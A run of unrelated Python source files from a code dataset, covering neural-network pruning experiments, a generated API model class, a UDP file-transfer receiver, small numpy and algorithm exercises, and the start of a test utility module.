prune_rate * (1.0 - overall_prune_rate)\n\n # Make sure each iteration of pruning uses that same trained weights to determine pruning mask\n model.set_weights(trained_weights)\n pruner.calc_prune_mask(model, prune_rate, prune_strategy)\n # Now revert model to original random starting weights and apply pruning\n model.set_weights(starting_weights)\n pruner.apply_pruning(model)\n\n experiment = 'no_training_pruned@{:.4f}'.format(overall_prune_rate)\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n\n pruner.reset_masks()\n\n # Calculate pruning mask below using trained weights\n model.set_weights(trained_weights)\n\n # Now train from original weights and prune during training\n prune_rate = 0.2\n overall_prune_rate = 0.0\n for i in range(num_prune_rounds):\n prune_rate = pow(prune_rate, 1.0 / (i + 1))\n overall_prune_rate = overall_prune_rate + prune_rate * (1.0 - overall_prune_rate)\n\n # Calculate the pruning mask using the trained model and it's final trained weights\n pruner.calc_prune_mask(model, prune_rate, prune_strategy)\n\n # Now create a new model that has the original random starting weights and train it\n experiment = 'pruned@{:.4f}'.format(overall_prune_rate)\n mnist_pruned = MNISTPruned(experiment, pruner, use_dwr=use_dwr, which_set=which_set)\n prune_trained_model = mnist_pruned.create_model()\n prune_trained_model.set_weights(starting_weights)\n mnist_pruned.fit(prune_trained_model, epochs)\n losses[experiment], accuracies[experiment] = mnist_pruned.evaluate(prune_trained_model)\n\n epoch_logs = _merge_epoch_logs(epoch_logs, mnist_pruned.get_epoch_logs())\n _to_floats(epoch_logs)\n\n # Periodically save the results to allow inspection during these multiple lengthy iterations\n with open(os.path.join(output_dir, 'epoch_logs.json'), 'w') as f:\n json.dump(epoch_logs, f, indent=4)\n\n # Now save csv file so it's easier to compare loss, accuracy across the experiments\n headings = []\n for experiment in epoch_logs[0].keys():\n headings.extend([experiment, '', '', ''])\n sub_headings = ['train_loss', 'train_acc', 'val_loss', 'val_acc'] * len(epoch_logs[0])\n epoch_logs_df = pd.DataFrame([], columns=[headings, sub_headings])\n all_keys = set(epoch_logs[0].keys())\n for epoch, epoch_results in epoch_logs.items():\n row = []\n for experiment in all_keys:\n if experiment in epoch_results:\n exp_dict = epoch_logs[epoch][experiment]\n row.extend([exp_dict['loss'], exp_dict['acc'], exp_dict['val_loss'], exp_dict['val_acc']])\n else:\n row.extend([math.nan, math.nan, math.nan, math.nan])\n\n epoch_logs_df.loc[epoch] = row\n epoch_logs_df.to_csv(os.path.join(output_dir, 'epoch_logs.csv'))\n\n return losses, accuracies\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--iterations', type=int, required=True, default=1,\n help='How many iterations to do. The final results will be averaged over these iterations.')\n parser.add_argument('--epochs', type=int, required=False, default=20,\n help='How many epochs to train for.')\n parser.add_argument('--which_set', type=str, required=False, default='mnist',\n help='Which data set to use. Must be one of \"mnist\", \"cifar10\" or \"cifar10_reduced_10x\". '\n '\"cifar10_reduced_10x\" is the cifar10 data set with 10x fewer training, test samples. This is '\n 'useful for evaluating these pruning strategies using less data')\n parser.add_argument('--prune_strategy', type=str, required=False, default='smallest_weights_global',\n help='Which pruning strategy to use. Must be one of \"random\", \"smallest_weights\", \"smallest_weights_global\".'\n 'See docs for LotteryTicketPruner.calc_prune_mask() for full details.')\n parser.add_argument('--dwr', action='store_true',\n help='Dynamice Weight Rescaling. Specify this to have unpruned weights rescaled after pruning is done.')\n args = parser.parse_args()\n\n base_output_dir = os.path.dirname(__file__)\n\n for i in range(args.iterations):\n output_dir = os.path.join(base_output_dir, '{}_{}_{}_{}'.format(args.which_set, args.prune_strategy,\n args.epochs, i))\n os.makedirs(output_dir, exist_ok=True)\n losses, accuracies = evaluate(args.which_set, args.prune_strategy, args.dwr, args.epochs, output_dir)\n\n if i == 0:\n # Only add headings once per every two sub-headings to reduce verbosity\n headings = []\n for key in losses.keys():\n headings.extend([key, ''])\n sub_headings = ['loss', 'acc'] * len(losses)\n results_df = pd.DataFrame([], columns=[headings, sub_headings])\n row = []\n for key in losses.keys():\n row.extend([losses[key], accuracies[key]])\n results_df.loc[i] = row\n\n results_df.to_csv(os.path.join(base_output_dir,\n '{}_{}{}_{}_results.csv'.format(args.which_set, args.prune_strategy,\n '_dwr' if args.dwr else '', args.epochs)))\n print(results_df)\n\n mean = results_df.mean(axis=0)\n results_df.loc['average'] = mean\n results_df.to_csv(os.path.join(base_output_dir, '{}_{}{}_{}_results.csv'.format(args.which_set, args.prune_strategy,\n '_dwr' if args.dwr else '',\n args.epochs)))\n print(results_df)\n","sub_path":"examples/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":20033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"320337138","text":"# coding: utf-8\n\n\"\"\"\n ML Lab Service\n\n Functionality to create and manage Lab projects, services, datasets, models, and experiments. # noqa: E501\n\n OpenAPI spec version: 3.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass HostInfo(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'hostname': 'str',\n 'os': 'str',\n 'cpu': 'str',\n 'cpu_cores': 'str',\n 'memory_size': 'str',\n 'python_version': 'str',\n 'python_compiler': 'str',\n 'python_impl': 'str',\n 'workspace_version': 'str',\n 'gpus': 'list[str]'\n }\n\n attribute_map = {\n 'hostname': 'hostname',\n 'os': 'os',\n 'cpu': 'cpu',\n 'cpu_cores': 'cpuCores',\n 'memory_size': 'memorySize',\n 'python_version': 'pythonVersion',\n 'python_compiler': 'pythonCompiler',\n 'python_impl': 'pythonImpl',\n 'workspace_version': 'workspaceVersion',\n 'gpus': 'gpus'\n }\n\n def __init__(self, hostname=None, os=None, cpu=None, cpu_cores=None, memory_size=None, python_version=None, python_compiler=None, python_impl=None, workspace_version=None, gpus=None): # noqa: E501\n \"\"\"HostInfo - a model defined in Swagger\"\"\" # noqa: E501\n\n self._hostname = None\n self._os = None\n self._cpu = None\n self._cpu_cores = None\n self._memory_size = None\n self._python_version = None\n self._python_compiler = None\n self._python_impl = None\n self._workspace_version = None\n self._gpus = None\n self.discriminator = None\n\n if hostname is not None:\n self.hostname = hostname\n if os is not None:\n self.os = os\n if cpu is not None:\n self.cpu = cpu\n if cpu_cores is not None:\n self.cpu_cores = cpu_cores\n if memory_size is not None:\n self.memory_size = memory_size\n if python_version is not None:\n self.python_version = python_version\n if python_compiler is not None:\n self.python_compiler = python_compiler\n if python_impl is not None:\n self.python_impl = python_impl\n if workspace_version is not None:\n self.workspace_version = workspace_version\n if gpus is not None:\n self.gpus = gpus\n\n @property\n def hostname(self):\n \"\"\"Gets the hostname of this HostInfo. # noqa: E501\n\n\n :return: The hostname of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._hostname\n\n @hostname.setter\n def hostname(self, hostname):\n \"\"\"Sets the hostname of this HostInfo.\n\n\n :param hostname: The hostname of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._hostname = hostname\n\n @property\n def os(self):\n \"\"\"Gets the os of this HostInfo. # noqa: E501\n\n\n :return: The os of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._os\n\n @os.setter\n def os(self, os):\n \"\"\"Sets the os of this HostInfo.\n\n\n :param os: The os of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._os = os\n\n @property\n def cpu(self):\n \"\"\"Gets the cpu of this HostInfo. # noqa: E501\n\n\n :return: The cpu of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cpu\n\n @cpu.setter\n def cpu(self, cpu):\n \"\"\"Sets the cpu of this HostInfo.\n\n\n :param cpu: The cpu of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._cpu = cpu\n\n @property\n def cpu_cores(self):\n \"\"\"Gets the cpu_cores of this HostInfo. # noqa: E501\n\n\n :return: The cpu_cores of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cpu_cores\n\n @cpu_cores.setter\n def cpu_cores(self, cpu_cores):\n \"\"\"Sets the cpu_cores of this HostInfo.\n\n\n :param cpu_cores: The cpu_cores of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._cpu_cores = cpu_cores\n\n @property\n def memory_size(self):\n \"\"\"Gets the memory_size of this HostInfo. # noqa: E501\n\n\n :return: The memory_size of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._memory_size\n\n @memory_size.setter\n def memory_size(self, memory_size):\n \"\"\"Sets the memory_size of this HostInfo.\n\n\n :param memory_size: The memory_size of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._memory_size = memory_size\n\n @property\n def python_version(self):\n \"\"\"Gets the python_version of this HostInfo. # noqa: E501\n\n\n :return: The python_version of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_version\n\n @python_version.setter\n def python_version(self, python_version):\n \"\"\"Sets the python_version of this HostInfo.\n\n\n :param python_version: The python_version of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_version = python_version\n\n @property\n def python_compiler(self):\n \"\"\"Gets the python_compiler of this HostInfo. # noqa: E501\n\n\n :return: The python_compiler of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_compiler\n\n @python_compiler.setter\n def python_compiler(self, python_compiler):\n \"\"\"Sets the python_compiler of this HostInfo.\n\n\n :param python_compiler: The python_compiler of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_compiler = python_compiler\n\n @property\n def python_impl(self):\n \"\"\"Gets the python_impl of this HostInfo. # noqa: E501\n\n\n :return: The python_impl of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._python_impl\n\n @python_impl.setter\n def python_impl(self, python_impl):\n \"\"\"Sets the python_impl of this HostInfo.\n\n\n :param python_impl: The python_impl of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._python_impl = python_impl\n\n @property\n def workspace_version(self):\n \"\"\"Gets the workspace_version of this HostInfo. # noqa: E501\n\n\n :return: The workspace_version of this HostInfo. # noqa: E501\n :rtype: str\n \"\"\"\n return self._workspace_version\n\n @workspace_version.setter\n def workspace_version(self, workspace_version):\n \"\"\"Sets the workspace_version of this HostInfo.\n\n\n :param workspace_version: The workspace_version of this HostInfo. # noqa: E501\n :type: str\n \"\"\"\n\n self._workspace_version = workspace_version\n\n @property\n def gpus(self):\n \"\"\"Gets the gpus of this HostInfo. # noqa: E501\n\n\n :return: The gpus of this HostInfo. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._gpus\n\n @gpus.setter\n def gpus(self, gpus):\n \"\"\"Sets the gpus of this HostInfo.\n\n\n :param gpus: The gpus of this HostInfo. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._gpus = gpus\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(HostInfo, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, HostInfo):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"services/lab-workspace/docker-res/duplicated-resources/ml-lab-py/lab_api/swagger_client/models/host_info.py","file_name":"host_info.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2777398","text":"import sys, socket, random\nfrom stp_packet import StpPacket\nimport log_helper\n\n\nDEBUG_MODE = False\n# argv\nargv_port = ''\nargv_filename = ''\n# statistics\nnum_received_bytes = 0\nnum_seg = 0\nnum_data_seg = 0\nnum_data_error = 0\nnum_dup_data_seg = 0\nnum_dup_ack = 0\n\n\ndef parse_argv():\n global DEBUG_MODE\n global argv_port\n global argv_filename\n\n if len(sys.argv) != 3:\n print('Usage:' +\n 'python receiver.py receiver_port output_file_name')\n sys.exit(1)\n\n argv_port = int(sys.argv[1])\n argv_filename = sys.argv[2]\n\n\ndef wait_for_handshake(udp_socket):\n global DEBUG_MODE\n global argv_port\n global num_seg\n\n data, address = udp_socket.recvfrom(argv_port)\n log_helper.init('Receiver_log.txt')\n num_seg += 1\n packet1 = StpPacket()\n packet1.from_byte_array(data)\n log_helper.log_packet('rcv', packet1)\n\n client_isn = packet1.sequenceNum\n\n # Base on the sample log, it seems that we do need to use random server_isn\n # server_isn = random.randint(0, 2 ** 32)\n server_isn = 0\n if not(packet1.isValid and packet1.isSyn and packet1.ackNum == 0):\n print('Receiver: Connection error')\n sys.exit(1)\n\n # Send ACK\n packet2 = StpPacket()\n packet2.isSyn = True\n packet2.sequenceNum = server_isn\n packet2.ackNum = client_isn + 1\n udp_socket.sendto(packet2.to_byte_array(), address)\n log_helper.log_packet('snd', packet2)\n\n # Receive ACK\n data, _ = udp_socket.recvfrom(argv_port)\n num_seg += 1\n packet3 = StpPacket()\n packet3.from_byte_array(data)\n log_helper.log_packet('rcv', packet3)\n if not(packet3.isValid and packet3.sequenceNum == client_isn + 1 and packet3.ackNum == server_isn + 1):\n print('Receiver: Connection error')\n sys.exit(1)\n\n if DEBUG_MODE:\n print('Receiver: handshake success')\n return client_isn, server_isn\n\n\ndef receive_file(udp_socket, client_isn, server_isn):\n global DEBUG_MODE\n global argv_filename\n global argv_port\n global num_received_bytes\n global num_seg\n global num_data_seg\n global num_data_error\n global num_dup_data_seg\n global num_dup_ack\n\n if DEBUG_MODE:\n print('Start Receive File')\n\n packets_window = []\n WINDOW_SIZE = 10\n next_seq_num = 0\n with open(argv_filename, 'wb') as f:\n while True:\n try:\n data, sender_address = udp_socket.recvfrom(argv_port)\n num_seg += 1\n\n p = StpPacket()\n p.from_byte_array(data)\n log_helper.log_packet('rcv', p)\n if not p.isFin:\n num_data_seg += 1\n if not p.isValid:\n num_data_error += 1\n\n if not p.isValid:\n # Any segment that is found corrupted is discarded at\n # the receiver without generating a duplicate Ack.\n continue\n\n if p.isFin:\n f.close()\n tear_down(udp_socket, sender_address, p, client_isn, server_isn, next_seq_num)\n break\n else:\n # we do not count the segment into data segment if it is invalid\n\n if next_seq_num == p.sequenceNum - client_isn - 1:\n if DEBUG_MODE:\n print(\"receiver: receive \" + str(next_seq_num))\n f.write(p.data)\n next_seq_num += len(p.data)\n\n while True:\n next_packet = None\n for p in packets_window:\n if p.sequenceNum - client_isn - 1 == next_seq_num:\n next_packet = p\n break\n if next_packet is None:\n break\n else:\n packets_window.remove(next_packet)\n f.write(next_packet.data)\n next_seq_num += len(next_packet.data)\n\n num_received_bytes = next_seq_num\n\n # send ACK\n ack_packet = StpPacket()\n ack_packet.isAck = True\n ack_packet.ackNum = next_seq_num + server_isn + 1\n udp_socket.sendto(ack_packet.to_byte_array(), sender_address)\n log_helper.log_packet('snd', ack_packet)\n else:\n if p.sequenceNum < next_seq_num:\n # Duplicate data segments\n num_dup_data_seg += 1\n # reacknowledge\n num_dup_ack += 1\n ack_packet = StpPacket()\n ack_packet.isAck = True\n ack_packet.ackNum = next_seq_num + server_isn + 1\n udp_socket.sendto(ack_packet.to_byte_array(), sender_address)\n log_helper.log_packet('snd', ack_packet)\n\n packets_window.append(p)\n if len(packets_window) >= WINDOW_SIZE:\n packets_window.pop(0)\n except socket.timeout:\n print(\"Receiver: Connection Timeout\")\n sys.exit(0)\n\n\ndef tear_down(udp_socket, address, p1, client_isn, server_isn, final_seq_no):\n global argv_port\n global DEBUG_MODE\n global num_seg\n\n if DEBUG_MODE:\n print(\"Receiver: Client Tear Down Init\")\n\n p2 = StpPacket()\n p2.isAck = True\n p2.ackNum = p1.sequenceNum - client_isn - 1 + 1 + server_isn + 1\n udp_socket.sendto(p2.to_byte_array(), address)\n log_helper.log_packet('snd', p2)\n\n p3 = StpPacket()\n p3.isFin = True\n p3.sequenceNum = server_isn + 1 + final_seq_no\n udp_socket.sendto(p3.to_byte_array(), address)\n log_helper.log_packet('snd', p3)\n\n while True:\n data, sender_address = udp_socket.recvfrom(argv_port)\n num_seg += 1\n if len(data) == 0:\n break\n p4 = StpPacket()\n p4.from_byte_array(data)\n log_helper.log_packet('rcv', p4)\n if p4.isValid:\n if p4.isAck and p4.ackNum - client_isn - 1 == p3.sequenceNum + 1 - server_isn - 1:\n break\n\n\ndef main():\n global argv_port\n\n global num_received_bytes\n global num_seg\n global num_data_seg\n global num_data_error\n global num_dup_data_seg\n global num_dup_ack\n\n parse_argv()\n\n address = ('127.0.0.1', argv_port)\n udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n udp_socket.bind(address)\n\n client_isn, server_isn = wait_for_handshake(udp_socket)\n\n receive_file(udp_socket, client_isn, server_isn)\n udp_socket.close()\n\n log_helper.log_text('=============================================================')\n log_helper.log_text('Amount of data received (bytes)\\t' + str(num_received_bytes))\n log_helper.log_text('Total Segments Received\\t' + str(num_seg))\n log_helper.log_text('Data segments received\\t' + str(num_data_seg))\n log_helper.log_text('Data segments with Bit Errors\\t' + str(num_data_error))\n log_helper.log_text('Duplicate data segments received\\t' + str(num_dup_data_seg))\n log_helper.log_text('Duplicate ACKs sent\\t' + str(num_dup_ack))\n log_helper.log_text('=============================================================')\n log_helper.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"569367098","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\namazon = pd.read_csv('static/data/amazon_sentiment100_results.csv')\nsst = pd.read_csv('static/data/sst_sentiment100_results.csv')\ntwitter = pd.read_csv('static/data/twitter_sentiment100_results.csv')\n\nstandard = pd.read_csv('static/data/swim_thin.csv')\nplus = pd.read_csv('static/data/swim_plus.csv')\n\nbox = {\"amazon\":amazon, \"sst\":sst, \"twitter\":twitter, \"standard\": standard, \"plus\" : plus}\n\n\ndef colorize(i):\n\tif i%2==0:\n\t\treturn '#ED1C24'\n\telse:\n\t\treturn '#00AEEF'\n\n\ndef plot(data,models):\n\ti = 0\n\tfor m in models:\n\t for d in data:\n\t plt.figure(i)\n\t col = box[d][m]\n\t plt.hist(col, normed=True, bins=30, color = colorize(i))\n\t plt.ylabel('Probability');\n\t plt.title(\"{} => {}\".format(d,m))\n\t i+=1\n\nfrom IPython.display import HTML\nHTML('''\n ''')\n\ndef init(URL):\n\treturn(unique(URL[URL.index('?data=')+6:URL.index('&')].split(',')), unique(URL[URL.index('&model=')+7:].split(',')))\n\ndef unique(x):\n\treturn(list(set(x)))\n\n\ndef summarize(data, models):\n\tprint(\"using datatsets: '{}\".format(\"','\".join(data)) + \"'\")\n\tprint(\"using models: '{}\".format(\"','\".join(models)) + \"'\")\n\tprint(\"access raw values with 'box[][]'\")\n\tfor d in data:\n\t\ttry:\n\t\t\tdatum = box[d]\n\t\t\ttry:\n\t\t\t\tprint(\"Stimulus mean is {}\".format(datum['label'].mean()))\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tfor m in models:\n\t\t\t\tprint(\"{} => {} = '{}' (mean)\".format(d, m.capitalize(), round(datum[m].mean(),4)))\t\t\n\t\texcept:\n\t\t\tpass\n\n\n\n\n\n\n","sub_path":"front-end/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"322068507","text":"\"\"\"\nIterating multiple lists at the same time\n\"\"\"\n\nl1 = [1, 9, 3]\nl2 = [6, 7, 8, 20, 30, 40]\n\nfor a, b in zip(l1, l2): # Zip() creates the pairs of elements when two lists passed into the function.\n # Stops at the end of the shorter list.\n # print(a)\n # print(b)\n if a > b:\n print(a)\n else:\n print(b)","sub_path":"Program Control Flow/multiple_list.py","file_name":"multiple_list.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307387527","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\b3\\storage\\cursor.py\n# Compiled at: 2016-03-08 18:42:10\n\n\nclass Cursor(object):\n _cursor = None\n _conn = None\n fields = None\n lastrowid = 0\n rowcount = 0\n EOF = False\n\n def __init__(self, cursor, conn):\n \"\"\"\n Object constructor.\n :param cursor: The opened result cursor.\n :param conn: The database connection instance.\n \"\"\"\n self._cursor = cursor\n self._conn = conn\n self.rowcount = self._cursor.rowcount\n self.lastrowid = self._cursor.lastrowid\n try:\n self.EOF = self.moveNext()\n except Exception:\n self.EOF = not self.fields or self.rowcount <= 0 or not self._cursor\n\n def moveNext(self):\n \"\"\"\n Move the cursor to the next available record.\n :return True if there is one more record, False otherwise.\n \"\"\"\n if not self.EOF:\n self.fields = self._cursor.fetchone()\n self.EOF = not self.fields or not self._cursor\n if self.EOF:\n self.close()\n return self.EOF\n\n def getOneRow(self, default=None):\n \"\"\"\n Return a row from the current result set and close it.\n :return The row fetched from the result set or default if the result set is empty.\n \"\"\"\n if self.EOF:\n return default\n row = self.getRow()\n self.close()\n return row\n\n def getRow(self):\n \"\"\"\n Return a result set row into a dict.\n :return The result set row or an empty dict if there are no more records in this result set.\n \"\"\"\n if self.EOF:\n return dict()\n d = dict()\n desc = self._cursor.description\n for i in xrange(0, len(self.fields)):\n d[desc[i][0]] = self.fields[i]\n\n return d\n\n def getValue(self, key, default=None):\n \"\"\"\n Return a value from the current result set row.\n :return The value extracted from the result set or default if the the given key doesn't match any field.\n \"\"\"\n row = self.getRow()\n if key in row:\n return row[key]\n return default\n\n def close(self):\n \"\"\"\n Close the active result set.\n \"\"\"\n if self._cursor:\n self._cursor.close()\n self._cursor = None\n self.EOF = True\n return","sub_path":"pycfiles/b3-1.10.10-py2.7/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"14902442","text":"N, X = list(map(int, input().split()))\nx = list(map(int, input().split()))\n\ndiff = [abs(i - X) for i in x]\n\ndef gcd(a, b):\n if a < b:\n a, b = b, a\n if b == 0:\n return a\n c = a % b\n return gcd(b, c)\n\nans = diff[0]\n\nfor i in range(N - 1):\n ans = gcd(ans, diff[i + 1])\n\nprint(ans)","sub_path":"AtCoder/ABC/109/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"282773928","text":"import argparse\n\n\nclass BaseSettings:\n\n\n def __init__(self):\n #if not os.path.exists(self.date):\n # os.mkdir(self.date)\n if not os.path.exists(self.records_dir):\n os.mkdir(self.records_dir)\n\n\n self.parser = argparse.ArgumentParser()\n self.parser.add_argument('-v', dest='verbose')\n self.parser.add_argument('-e', dest='exitonerror', action=\"store_true\", help=\"exit on error\") # not yet\n self.parser.add_argument('-t', dest='dryrun', action=\"store_true\", help='dry run')\n\n #just one copy of this for the class\n Settings.args = parser.parse_args()\n\n\n def cluck(self, msg, vlevel=5):\n '''\n a message which would generate loads of lines would be like self.cluck('blah', 9).\n A really important, rare message like self.cluck('blah', 2)\n Expect half the messages to be emmitted with a -v 5 invocation\n '''\n if self.args.verbose >= vlevel:\n print(msg)\n \n\nif __name__ == \"__main__\":\n\n\n class Settings(BaseSettings):\n # settings here\n records_dir = 'downloaded'\n def __init__(self):\n BaseSettings.__init(self)\n \n self.parser.description('test app')\n self.parser.add_argument(\n '-o', dest='old_too', action=\"store_true\", \n help='download old podcasts too'\n )\n\n parser.add_argument('-r', dest='norandom', action=\"store_true\")\n \n \n class MyApp(Settings):\n \n def __init__(self, var):\n self.var = var\n \n Settings.__init__(self)\n \n def tst(self):\n print(\"tst\")\n \n \n a = MyApp()\n a.cluck(a.records_dir)\n a.tst()\n","sub_path":"BaseSettings.py","file_name":"BaseSettings.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"99191748","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\nfrom task.tieba import get_title, get_pics, get_max_page, down_pics\nfrom celery import group\n\n\nurl = 'xxxx'\nmax_page_task = get_max_page.delay(url)\nmax_page = max_page_task.get(timeout=60)\nurls = [ url + '&pn=' + str(i) for i in xrange(1, int(max_page)+1)]\n\nfor u in urls:\n (get_pics.s(u) | down_pics.s())()\n","sub_path":"asyncspider/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"248350730","text":"import numpy as np\r\n\r\ndef f1():\r\n class a:\r\n x=0\r\n y=0\r\n z=True\r\n\r\n w=a()\r\n print(hasattr(a,'t'))\r\n print(hasattr(a,'x'))\r\n print(hasattr(a,'y'))\r\n print(hasattr(a,'s'))\r\n\r\ndef f2():\r\n a=dict()\r\n a['s']=1\r\n print(a)\r\n\r\n\r\ndef f3():\r\n x=np.random.normal(size=(3,4))\r\n print(x)\r\n\r\n\r\ndef f4():\r\n W=np.random.randint(9,size=(2,4))\r\n b=np.random.randint(3,size=4)\r\n print(W)\r\n print(b)\r\n print(np.vstack((W,b)))\r\n\r\ndef f5():\r\n X=np.random.randint(9,size=(2,4))\r\n X_=np.tanh(X)\r\n print(X_)\r\n\r\ndef f6():\r\n N=2\r\n D=4\r\n newD=3\r\n X=np.random.randint(9,size=(N,D))\r\n W=np.random.randint(9,size=(D,newD))\r\n b=np.random.randint(9,size=(1,newD))\r\n X_=np.hstack((X,np.ones((N,1))))\r\n W_=np.vstack((W,b))\r\n print(np.dot(X_,W_))\r\n B=np.dot(np.ones((N,1)),b)\r\n print(np.dot(X,W)+B)\r\n\r\n\r\ndef f7():\r\n W=np.random.randint(9,size=(2,4))\r\n print(W)\r\n print()\r\n print(W-1)\r\n\r\n\r\ndef f8():\r\n a=np.random.randint(7,size = (2,4))\r\n b=np.ones((1,4))\r\n print(a)\r\n print(a+b)\r\n\r\n\r\ndef f9():\r\n a=np.random.normal(size=(1,4))\r\n print(a)\r\n print(a.mean())\r\n print(a.var())\r\n\r\ndef f10():\r\n a=np.random.normal(size=(2,4))\r\n b=np.eye(2.5)\r\n print(b)\r\n\r\ndef f11():\r\n a = np.random.randint(10,size=(2,3))\r\n print(a)\r\n mx = np.dot(np.max(a,axis=1).reshape((len(a),1)),np.ones((1,len(a[0]))))\r\n print(mx)\r\n c = np.exp(a-mx)\r\n print(c)\r\n sum = np.dot(np.sum(c,axis=1).reshape((len(a),1)),np.ones((1,len(a[0]))))\r\n print(sum)\r\n e = c/sum\r\n print(e)\r\nf11()\r\n","sub_path":"Neural_Net/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"62665825","text":"'''\nYour function should take in a single parameter (a string `word`)\nYour function should return a count of how many occurences of ***\"th\"*** occur within `word`. Case matters.\nYour function must utilize recursion. It cannot contain any loops.\n'''\n# test_word = \"abcthefthghith\"\n\n# --------------- Refactored function\n\ndef count_th(word):\n occurrences = 0\n\n def incrementer(word):\n nonlocal occurrences\n try:\n if word.index('th') >= 0:\n new_word = word.replace('th', '', 1)\n occurrences += 1\n incrementer(new_word)\n except:\n return occurrences\n # return occurrences\n\n incrementer(word)\n return occurrences\n\n\n# print(count_th(test_word))\n\n# ------------- Original function\n\n# test_word = \"abcthefthghith\" # Should return 3\n# occurrences = 0\n# def count_th(word):\n# global occurrences\n# try:\n# if word.index('th') >= 0:\n# new_word = word.replace('th', '', 1)\n# occurrences += 1\n# count_th(new_word)\n# except:\n# return occurrences\n# return occurrences\n\n# print(count_th(test_word))","sub_path":"recursive_count_th/count_th.py","file_name":"count_th.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"115597131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUtility/common code of library.\n\"\"\"\n\n__author__ = 'Grzegorz Latuszek, Marcin Usielski, Michal Ernst'\n__copyright__ = 'Copyright (C) 2018-2019, Nokia'\n__email__ = 'grzegorz.latuszek@nokia.com, marcin.usielski@nokia.com, michal.ernst@nokia.com'\n\nimport logging\nimport time\nimport gc\nimport pprint\nfrom functools import partial\nfrom functools import wraps\nfrom types import FunctionType, MethodType\n\nfrom moler.connection_observer import ConnectionObserver\nfrom moler.exceptions import MolerException\nfrom moler.exceptions import ExecutionException\n\n\nclass MolerTest(object):\n\n @staticmethod\n def steps_end():\n \"\"\"\n You should 